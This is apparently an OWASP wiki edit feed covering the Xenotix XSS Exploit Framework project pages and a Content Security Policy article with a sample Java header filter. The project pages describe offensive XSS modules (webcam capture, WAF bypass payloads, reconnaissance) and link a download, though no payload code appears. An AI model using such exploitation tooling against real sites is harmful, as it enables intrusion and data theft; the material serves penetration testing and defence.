&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Xss_protection.png&amp;diff=177803</id>
		<title>File:Xss protection.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Xss_protection.png&amp;diff=177803"/>
				<updated>2014-06-30T04:33:43Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: The Ultimate XSS Protection Cheat Sheet for Developers&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The Ultimate XSS Protection Cheat Sheet for Developers&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=177147</id>
		<title>Projects/OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=177147"/>
				<updated>2014-06-17T18:24:52Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Project About&lt;br /&gt;
| project_name =OWASP Xenotix XSS Exploit Framework&lt;br /&gt;
&lt;br /&gt;
| project_description =OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
| project_license =Creative Commons Attribution ShareAlike 3.0 License&lt;br /&gt;
| leader_name1 =Ajin Abraham&lt;br /&gt;
| leader_email1 =ajin25@gmail.com &lt;br /&gt;
| mailing_list_name = https://lists.owasp.org/mailman/listinfo/owasp_xenotix_xss_exploit_framework&lt;br /&gt;
| project_road_map = https://www.owasp.org/index.php/Projects/OWASP_Xenotix_XSS_Exploit_Framework/Roadmap&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Content_Security_Policy&amp;diff=176458</id>
		<title>Content Security Policy</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Content_Security_Policy&amp;diff=176458"/>
				<updated>2014-06-05T19:39:38Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: spelling correction&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Last revision (mm/dd/yy): '''08/31/2013'''&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
'''CSP''' stands for '''C'''ontent '''S'''ecurity '''P'''olicy. &lt;br /&gt;
&lt;br /&gt;
Is an W3C specification offering the possbility to instruct the client browser from which location and/or which type of resources are allowed to be loaded. To define a loading behavior, the CSP specification use &amp;quot;directive&amp;quot; where a directive defines a loading behavior for a target resource type.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This article is based on version [http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html 1.1] of the W3C specification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Directives can be specified using HTTP response header (a server may send more than one CSP HTTP header field with a given resource representation and a server may send different CSP header field values with different representations of the same resource or with different resources) or HTML Meta tag, the HTTP headers below are defined by the specs:&lt;br /&gt;
* '''Content-Security-Policy''' : Defined by W3C Specs as standard header, used by Chrome version 25 and later, Firefox version 23 and later, Opera version 19 and later.&lt;br /&gt;
* '''X-Content-Security-Policy''' : Used by Firefox until version 23, and Internet Explorer version 10 (which partially implements Content Security Policy).&lt;br /&gt;
* '''X-WebKit-CSP''' : Used by Chrome until version 25&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The supported directives are:&lt;br /&gt;
* '''default-src''' : Define loading policy for all resources type in case of a resource type dedicated directive is not defined (fallback),&lt;br /&gt;
* '''script-src''' :  Define which scripts the protected resource can execute,&lt;br /&gt;
* '''object-src''' :  Define from where the protected resource can load plugins,&lt;br /&gt;
* '''style-src''' : Define which styles (CSS) the user applies to the protected resource,&lt;br /&gt;
* '''img-src''' : Define from where the protected resource can load images,&lt;br /&gt;
* '''media-src''' : Define from where the protected resource can load video and audio,&lt;br /&gt;
* '''frame-src''' : Define from where the protected resource can embed frames,&lt;br /&gt;
* '''font-src''' : Define from where the protected resource can load fonts,&lt;br /&gt;
* '''connect-src''' : Define which URIs the protected resource can load using script interfaces,&lt;br /&gt;
* '''form-action''' : Define which URIs can be used as the action of HTML form elements,&lt;br /&gt;
* '''sandbox''' : Specifies an HTML sandbox policy that the user agent applies to the protected resource,&lt;br /&gt;
* '''script-nonce''' : Define script execution by requiring the presence of the specified nonce on script elements,&lt;br /&gt;
* '''plugin-types''' : Define the set of plugins that can be invoked by the protected resource by limiting the types of resources that can be embedded,&lt;br /&gt;
* '''reflected-xss''' : Instructs a user agent to activate or deactivate any heuristics used to filter or block reflected cross-site scripting attacks, equivalent to the effects of the non-standard X-XSS-Protection header,&lt;br /&gt;
*  '''report-uri''' : Specifies a URI to which the user agent sends reports about policy violation&lt;br /&gt;
&lt;br /&gt;
An introduction to CSP is available on [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ HTML5Rocks].  The browser support is shown on http://caniuse.com/#feat=contentsecuritypolicy&lt;br /&gt;
&lt;br /&gt;
== Risk ==&lt;br /&gt;
The risk with CSP can have 2 main sources:&lt;br /&gt;
# Policies misconfiguration,&lt;br /&gt;
# Too permissive policies.&lt;br /&gt;
&lt;br /&gt;
== Countermeasure ==&lt;br /&gt;
This article will focus on providing an sample implementation of a JEE Web Filter in order to apply a set of CSP policies on all HTTP response returned by server. &lt;br /&gt;
&lt;br /&gt;
The policies will instruct the browser to have the loading behavior below using all HTTP headers defined in W3C Specs:&lt;br /&gt;
* Explicit loading definition of each resource type,&lt;br /&gt;
* Resources are loaded only from source domain,&lt;br /&gt;
* Inline style is not allowed,&lt;br /&gt;
* For JavaScript:&lt;br /&gt;
** ''Inline script'' will be allowed because inline scripting is commonly used (can be disabled if target site does not use this type of scripting),&lt;br /&gt;
** ''eval()'' function will be allowed in order to not break use of popular JavaScript libraries (ex: JQuery, JQueryUI, Sencha, ...) because they use eval() function (it was the case last time I have checked the source code from CDN ;) ),&lt;br /&gt;
* Generation of a random not guessable script nonce to use into all script tags,&lt;br /&gt;
* Plugin types only allow PDF and Flash,&lt;br /&gt;
* No font loading (configurable),&lt;br /&gt;
* No Audio / Video loading (configurable),&lt;br /&gt;
* Enable browser XSS filtering feature.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;color:navy&amp;quot;&amp;gt;&lt;br /&gt;
The support for CSP directives is not the same level in major browsers (Firefox/Chrome/IE). It's recommanded to check the support &lt;br /&gt;
provided by target browsers  (using site provided in link section of this article) in order to configure CSP policies. The sample &lt;br /&gt;
below try to provide a set of policies from which your can add policies specific to your application context.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''This implementation provide an option to add CSP directives used by Firefox (Mozilla CSP directives).''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import java.io.IOException;&lt;br /&gt;
import java.security.MessageDigest;&lt;br /&gt;
import java.security.NoSuchAlgorithmException;&lt;br /&gt;
import java.security.SecureRandom;&lt;br /&gt;
import java.util.ArrayList;&lt;br /&gt;
import java.util.List;&lt;br /&gt;
&lt;br /&gt;
import javax.servlet.Filter;&lt;br /&gt;
import javax.servlet.FilterChain;&lt;br /&gt;
import javax.servlet.FilterConfig;&lt;br /&gt;
import javax.servlet.ServletException;&lt;br /&gt;
import javax.servlet.ServletRequest;&lt;br /&gt;
import javax.servlet.ServletResponse;&lt;br /&gt;
import javax.servlet.annotation.WebFilter;&lt;br /&gt;
import javax.servlet.http.HttpServletRequest;&lt;br /&gt;
import javax.servlet.http.HttpServletResponse;&lt;br /&gt;
&lt;br /&gt;
import org.apache.commons.codec.binary.Hex;&lt;br /&gt;
&lt;br /&gt;
/**&lt;br /&gt;
 * Sample filter implementation to define a set of Content Security Policies.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 * This implementation has a dependency on Commons Codec API.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 * This filter set CSP policies using all HTTP headers defined into W3C specification.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &amp;lt;br/&amp;gt;&lt;br /&gt;
 * This implementation is oriented to be easily understandable and easily adapted.&amp;lt;br/&amp;gt;&lt;br /&gt;
 * &lt;br /&gt;
 */&lt;br /&gt;
@WebFilter(&amp;quot;/*&amp;quot;)&lt;br /&gt;
public class CSPPoliciesApplier implements Filter {&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if web app use web fonts */&lt;br /&gt;
	public static final boolean APP_USE_WEBFONTS = false;&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if web app use videos or audios */&lt;br /&gt;
	public static final boolean APP_USE_AUDIOS_OR_VIDEOS = false;&lt;br /&gt;
&lt;br /&gt;
	/** Configuration member to specify if filter must add CSP directive used by Mozilla (Firefox) */&lt;br /&gt;
	public static final boolean INCLUDE_MOZILLA_CSP_DIRECTIVES = true;&lt;br /&gt;
&lt;br /&gt;
	/** Filter configuration */&lt;br /&gt;
	@SuppressWarnings(&amp;quot;unused&amp;quot;)&lt;br /&gt;
	private FilterConfig filterConfig = null;&lt;br /&gt;
&lt;br /&gt;
	/** List CSP HTTP Headers */&lt;br /&gt;
	private List&amp;lt;String&amp;gt; cspHeaders = new ArrayList&amp;lt;String&amp;gt;();&lt;br /&gt;
&lt;br /&gt;
	/** Collection of CSP polcies that will be applied */&lt;br /&gt;
	private String policies = null;&lt;br /&gt;
&lt;br /&gt;
	/** Used for Script Nonce */&lt;br /&gt;
	private SecureRandom prng = null;&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * Used to prepare (one time for all) set of CSP policies that will be applied on each HTTP response.&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void init(FilterConfig fConfig) throws ServletException {&lt;br /&gt;
		// Get filter configuration&lt;br /&gt;
		this.filterConfig = fConfig;&lt;br /&gt;
&lt;br /&gt;
		// Init secure random&lt;br /&gt;
		try {&lt;br /&gt;
			this.prng = SecureRandom.getInstance(&amp;quot;SHA1PRNG&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		catch (NoSuchAlgorithmException e) {&lt;br /&gt;
			throw new ServletException(e);&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		// Define list of CSP HTTP Headers&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;Content-Security-Policy&amp;quot;);&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;X-Content-Security-Policy&amp;quot;);&lt;br /&gt;
		this.cspHeaders.add(&amp;quot;X-WebKit-CSP&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
		// Define CSP policies&lt;br /&gt;
		// Loading policies for Frame and Sandboxing will be dynamically defined : We need to know if context use Frame&lt;br /&gt;
		List&amp;lt;String&amp;gt; cspPolicies = new ArrayList&amp;lt;String&amp;gt;();&lt;br /&gt;
		String originLocationRef = &amp;quot;'self'&amp;quot;;&lt;br /&gt;
		// --Disable default source in order to avoid browser fallback loading using 'default-src' locations&lt;br /&gt;
		cspPolicies.add(&amp;quot;default-src 'none'&amp;quot;);&lt;br /&gt;
		// --Define loading policies for Scripts&lt;br /&gt;
		cspPolicies.add(&amp;quot;script-src &amp;quot; + originLocationRef + &amp;quot; 'unsafe-inline' 'unsafe-eval'&amp;quot;);&lt;br /&gt;
		if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;options inline-script eval-script&amp;quot;);&lt;br /&gt;
			cspPolicies.add(&amp;quot;xhr-src 'self'&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Plugins&lt;br /&gt;
		cspPolicies.add(&amp;quot;object-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Styles (CSS)&lt;br /&gt;
		cspPolicies.add(&amp;quot;style-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Images&lt;br /&gt;
		cspPolicies.add(&amp;quot;img-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Form&lt;br /&gt;
		cspPolicies.add(&amp;quot;form-action &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Audios/Videos&lt;br /&gt;
		if (APP_USE_AUDIOS_OR_VIDEOS) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;media-src &amp;quot; + originLocationRef);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Fonts&lt;br /&gt;
		if (APP_USE_WEBFONTS) {&lt;br /&gt;
			cspPolicies.add(&amp;quot;font-src &amp;quot; + originLocationRef);&lt;br /&gt;
		}&lt;br /&gt;
		// --Define loading policies for Connection&lt;br /&gt;
		cspPolicies.add(&amp;quot;connect-src &amp;quot; + originLocationRef);&lt;br /&gt;
		// --Define loading policies for Plugins Types&lt;br /&gt;
		cspPolicies.add(&amp;quot;plugin-types application/pdf application/x-shockwave-flash&amp;quot;);&lt;br /&gt;
		// --Define browser XSS filtering feature running mode&lt;br /&gt;
		cspPolicies.add(&amp;quot;reflected-xss block&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
		// Target formating&lt;br /&gt;
		this.policies = cspPolicies.toString().replaceAll(&amp;quot;(\\[|\\])&amp;quot;, &amp;quot;&amp;quot;).replaceAll(&amp;quot;,&amp;quot;, &amp;quot;;&amp;quot;).trim();&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * Add CSP policies on each HTTP response.&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#doFilter(javax.servlet.ServletRequest, javax.servlet.ServletResponse, javax.servlet.FilterChain)&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void doFilter(ServletRequest request, ServletResponse response, FilterChain fchain) throws IOException, ServletException {&lt;br /&gt;
		HttpServletRequest httpRequest = ((HttpServletRequest) request);&lt;br /&gt;
		HttpServletResponse httpResponse = ((HttpServletResponse) response);&lt;br /&gt;
&lt;br /&gt;
		/* Step 1 : Detect if target resource is a Frame */&lt;br /&gt;
		// Customize here according to your context...&lt;br /&gt;
		boolean isFrame = true;&lt;br /&gt;
&lt;br /&gt;
		/* Step 2 : Add CSP policies to HTTP response */&lt;br /&gt;
		StringBuilder policiesBuffer = new StringBuilder(this.policies);&lt;br /&gt;
&lt;br /&gt;
		// If resource is a frame add Frame/Sandbox CSP policy&lt;br /&gt;
		if (isFrame) {&lt;br /&gt;
			// Frame + Sandbox : Here sandbox allow nothing, customize sandbox options depending on your app....&lt;br /&gt;
			policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;frame-src 'self';sandbox&amp;quot;);&lt;br /&gt;
			if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {&lt;br /&gt;
				policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;frame-ancestors 'self'&amp;quot;);&lt;br /&gt;
			}&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		// Add Script Nonce CSP Policy&lt;br /&gt;
		// --Generate a random number&lt;br /&gt;
		String randomNum = new Integer(this.prng.nextInt()).toString();&lt;br /&gt;
		// --Get its digest&lt;br /&gt;
		MessageDigest sha;&lt;br /&gt;
		try {&lt;br /&gt;
			sha = MessageDigest.getInstance(&amp;quot;SHA-1&amp;quot;);&lt;br /&gt;
		}&lt;br /&gt;
		catch (NoSuchAlgorithmException e) {&lt;br /&gt;
			throw new ServletException(e);&lt;br /&gt;
		}&lt;br /&gt;
		byte[] digest = sha.digest(randomNum.getBytes());&lt;br /&gt;
		// --Encode it into HEXA&lt;br /&gt;
		String scriptNonce = Hex.encodeHexString(digest);&lt;br /&gt;
		policiesBuffer.append(&amp;quot;;&amp;quot;).append(&amp;quot;script-nonce &amp;quot;).append(scriptNonce);&lt;br /&gt;
		// --Made available script nonce in view app layer&lt;br /&gt;
		httpRequest.setAttribute(&amp;quot;CSP_SCRIPT_NONCE&amp;quot;, scriptNonce);&lt;br /&gt;
&lt;br /&gt;
		// Add policies to all HTTP headers&lt;br /&gt;
		for (String header : this.cspHeaders) {&lt;br /&gt;
			httpResponse.setHeader(header, policiesBuffer.toString());&lt;br /&gt;
		}&lt;br /&gt;
&lt;br /&gt;
		/* Step 3 : Let request continue chain filter */&lt;br /&gt;
		fchain.doFilter(request, response);&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
	/**&lt;br /&gt;
	 * {@inheritDoc}&lt;br /&gt;
	 * &lt;br /&gt;
	 * @see javax.servlet.Filter#destroy()&lt;br /&gt;
	 */&lt;br /&gt;
	@Override&lt;br /&gt;
	public void destroy() {&lt;br /&gt;
		// Not used&lt;br /&gt;
	}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
[[Automated Audit using w3af|w3af]] audit tools (http://w3af.org) contain [https://github.com/andresriancho/w3af/blob/master/plugins/grep/csp.py plugin] to automatically audit web application to check if they correctly implement CSP policies. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;color:#088A08&amp;quot;&amp;gt;&lt;br /&gt;
It's very useful to include this type of tools into a web application development process in order to &lt;br /&gt;
perform a regular automatic first level check (do not replace an manual audit and manual audit must be also conducted regularly).&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can also use  [https://www.oxdef.info/csp-tester CSP Tester (browser extension)] to build and test the policy for your web application.&lt;br /&gt;
&lt;br /&gt;
== Information links ==&lt;br /&gt;
* W3C Specifications: CSP 1.0  - http://www.w3.org/TR/CSP, CSP 1.1 - http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html&lt;br /&gt;
* Introduction to CSP: http://www.html5rocks.com/en/tutorials/security/content-security-policy&lt;br /&gt;
* CSP browser support: http://caniuse.com/#feat=contentsecuritypolicy&lt;br /&gt;
* CSP readiness browser testing: http://erlend.oftedal.no/blog/csp/readiness/&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Java Project]]&lt;br /&gt;
[[Category: Injection]]&lt;br /&gt;
[[Category:Attack]]&lt;br /&gt;
[[Category:Injection Attack]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=176404</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=176404"/>
				<updated>2014-06-04T09:43:22Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added download md5&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
